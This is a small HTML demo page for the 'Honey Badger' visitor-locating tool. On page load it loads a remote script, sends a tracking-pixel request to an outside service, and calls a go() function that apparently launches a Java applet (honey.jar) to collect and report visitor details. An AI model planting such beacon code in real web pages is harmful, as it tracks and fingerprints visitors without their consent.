<!doctype html>
<head>
<script type="text/javascript" src="http://honeybadger.lanmaster53.com/honey.js"></script>
</head>
<body>
<h1>This is the Demo page for the crazy, nastyass "Honey Badger".</h1>
<img src="http://honeybadger.lanmaster53.com/service.php?target=Demo_Page&agent=HTML" onerror="go('http://honeybadger.lanmaster53.com/service.php','Demo_Page','honey.jar',true,true,5000);" width="1px" height="1px" />
</body>
</html>
